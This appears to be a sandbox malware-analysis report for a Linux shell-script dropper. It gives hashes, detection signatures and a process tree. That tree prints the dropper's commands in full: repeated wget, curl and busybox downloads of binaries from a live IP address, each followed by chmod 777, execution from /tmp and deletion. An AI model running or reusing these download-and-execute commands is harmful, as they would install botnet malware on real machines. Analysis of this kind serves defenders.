Analysis
-
max time kernel
31s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
14-11-2024 02:38
Static task
static1
Behavioral task
behavioral1
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
-
Size
10KB
-
MD5
b511b6f4aeffa16d10d0f7ef26b0e23b
-
SHA1
83f64c0a7d2007fd0182aaae9636c5bbba453efe
-
SHA256
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc
-
SHA512
a1c7929b890f434323d545f2ff0617c27810df5928f3e0293cf4ac5bb7f3014d60af9634e6d734311204d66700d5b1b0c248f868d6a55b9e14c1c694c458e1c4
-
SSDEEP
96:mb9FNeCpCayHzBeLXN04ASV4A/vfyOaMw9FNeCzxCayHzy+desXXoBA04ASBnvKx:m9L14A/vfyOa+/vfyOy
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid Process 1558 chmod 1698 chmod 1672 chmod 1594 chmod 1606 chmod 1612 chmod 1624 chmod 1588 chmod 1636 chmod 1684 chmod 1692 chmod 1582 chmod 1540 chmod 1570 chmod 1600 chmod 1660 chmod 1534 chmod 1576 chmod 1642 chmod 1678 chmod 1552 chmod 1564 chmod 1546 chmod 1630 chmod 1648 chmod 1654 chmod 1666 chmod 1618 chmod -
Executes dropped EXE 28 IoCs
Processes:
YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4IVYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZSfnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFdH8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoiRPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sEwTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQH9V9m6knvYYGckfXaKe6Jh0GbKifmOcHakcPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZKiPZx4shY7WXxXcOQVAYqR81gltVu2Td5FIROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6LFcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOGZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFtVYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZSfnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFdH8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakSYsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4IRPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sEwTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoiH9V9m6knvYYGckfXaKe6Jh0GbKifmOcHakcPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZKiPZx4shY7WXxXcOQVAYqR81gltVu2Td5FIROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6LFcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOGZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFtioc pid Process /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I 1535 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS 1541 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd 1547 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS 1553 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi 1559 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed 1565 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE 1571 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ 1577 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak 1583 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ 1589 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F 1595 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L 1601 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG 1607 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt 1613 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS 1619 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd 1625 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS 1631 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I 1637 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed 1643 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE 1649 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ 1655 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi 1661 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak 1667 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ 1673 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F 1679 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L 1685 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG 1693 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt 1699 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
busyboxbusyboxKiPZx4shY7WXxXcOQVAYqR81gltVu2Td5FrmwgetrmwgetcurlcurlKiPZx4shY7WXxXcOQVAYqR81gltVu2Td5Fpid Process 1677 busybox 1593 busybox 1595 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F 1596 rm 1675 wget 1680 rm 1591 wget 1592 curl 1676 curl 1679 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc Process File opened for modification /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt curl File opened for modification /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ curl File opened for modification /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt curl File opened for modification /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd curl File opened for modification /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L curl File opened for modification /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE curl File opened for modification /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I curl File opened for modification /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I curl File opened for modification /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG curl File opened for modification /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak curl File opened for modification /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE curl File opened for modification /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ curl File opened for modification /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd curl File opened for modification /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ curl File opened for modification /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi curl File opened for modification /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG curl File opened for modification /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed curl File opened for modification /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS curl File opened for modification /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ curl File opened for modification /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS curl File opened for modification /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi curl File opened for modification /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L curl File opened for modification /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS curl File opened for modification /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed curl File opened for modification /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak curl File opened for modification /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F curl File opened for modification /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS curl File opened for modification /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F curl
Processes
-
/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh1⤵PID:1526
-
/bin/rm/bin/rm bins.sh2⤵PID:1527
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:1528
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- Writes file to tmp directory
PID:1532
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:1533
-
-
/bin/chmodchmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- File and Directory Permissions Modification
PID:1534
-
-
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- Executes dropped EXE
PID:1535
-
-
/bin/rmrm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:1536
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:1537
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- Writes file to tmp directory
PID:1538
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:1539
-
-
/bin/chmodchmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- File and Directory Permissions Modification
PID:1540
-
-
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- Executes dropped EXE
PID:1541
-
-
/bin/rmrm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:1542
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:1543
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- Writes file to tmp directory
PID:1544
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:1545
-
-
/bin/chmodchmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- File and Directory Permissions Modification
PID:1546
-
-
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- Executes dropped EXE
PID:1547
-
-
/bin/rmrm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:1548
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:1549
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- Writes file to tmp directory
PID:1550
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:1551
-
-
/bin/chmodchmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- File and Directory Permissions Modification
PID:1552
-
-
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- Executes dropped EXE
PID:1553
-
-
/bin/rmrm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:1554
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:1555
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- Writes file to tmp directory
PID:1556
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:1557
-
-
/bin/chmodchmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- File and Directory Permissions Modification
PID:1558
-
-
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵
- Executes dropped EXE
PID:1559
-
-
/bin/rmrm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi2⤵PID:1560
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:1561
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- Writes file to tmp directory
PID:1562
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:1563
-
-
/bin/chmodchmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- File and Directory Permissions Modification
PID:1564
-
-
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- Executes dropped EXE
PID:1565
-
-
/bin/rmrm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:1566
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:1567
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- Writes file to tmp directory
PID:1568
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:1569
-
-
/bin/chmodchmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- File and Directory Permissions Modification
PID:1570
-
-
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵
- Executes dropped EXE
PID:1571
-
-
/bin/rmrm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE2⤵PID:1572
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:1573
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- Writes file to tmp directory
PID:1574
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:1575
-
-
/bin/chmodchmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- File and Directory Permissions Modification
PID:1576
-
-
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵
- Executes dropped EXE
PID:1577
-
-
/bin/rmrm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ2⤵PID:1578
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:1579
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- Writes file to tmp directory
PID:1580
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:1581
-
-
/bin/chmodchmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- File and Directory Permissions Modification
PID:1582
-
-
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵
- Executes dropped EXE
PID:1583
-
-
/bin/rmrm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak2⤵PID:1584
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:1585
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- Writes file to tmp directory
PID:1586
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:1587
-
-
/bin/chmodchmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- File and Directory Permissions Modification
PID:1588
-
-
/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵
- Executes dropped EXE
PID:1589
-
-
/bin/rmrm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ2⤵PID:1590
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:1591
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1592
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:1593
-
-
/bin/chmodchmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- File and Directory Permissions Modification
PID:1594
-
-
/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1595
-
-
/bin/rmrm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F2⤵
- System Network Configuration Discovery
PID:1596
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:1597
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- Writes file to tmp directory
PID:1598
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:1599
-
-
/bin/chmodchmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- File and Directory Permissions Modification
PID:1600
-
-
/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵
- Executes dropped EXE
PID:1601
-
-
/bin/rmrm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L2⤵PID:1602
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:1603
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- Writes file to tmp directory
PID:1604
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:1605
-
-
/bin/chmodchmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- File and Directory Permissions Modification
PID:1606
-
-
/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵
- Executes dropped EXE
PID:1607
-
-
/bin/rmrm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG2⤵PID:1608
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:1609
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- Writes file to tmp directory
PID:1610
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:1611
-
-
/bin/chmodchmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- File and Directory Permissions Modification
PID:1612
-
-
/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵
- Executes dropped EXE
PID:1613
-
-
/bin/rmrm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt2⤵PID:1614
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:1615
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- Writes file to tmp directory
PID:1616
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:1617
-
-
/bin/chmodchmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- File and Directory Permissions Modification
PID:1618
-
-
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵
- Executes dropped EXE
PID:1619
-
-
/bin/rmrm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS2⤵PID:1620
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:1621
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- Writes file to tmp directory
PID:1622
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:1623
-
-
/bin/chmodchmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- File and Directory Permissions Modification
PID:1624
-
-
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵
- Executes dropped EXE
PID:1625
-
-
/bin/rmrm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd2⤵PID:1626
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:1627
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- Writes file to tmp directory
PID:1628
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:1629
-
-
/bin/chmodchmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- File and Directory Permissions Modification
PID:1630
-
-
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵
- Executes dropped EXE
PID:1631
-
-
/bin/rmrm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS2⤵PID:1632
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:1633
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- Writes file to tmp directory
PID:1634
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:1635
-
-
/bin/chmodchmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- File and Directory Permissions Modification
PID:1636
-
-
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵
- Executes dropped EXE
PID:1637
-
-
/bin/rmrm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I2⤵PID:1638
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:1639
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- Writes file to tmp directory
PID:1640
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:1641
-
-
/bin/chmodchmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- File and Directory Permissions Modification
PID:1642
-
-
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵
- Executes dropped EXE
PID:1643
-
-
/bin/rmrm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed2⤵PID:1644
-
-
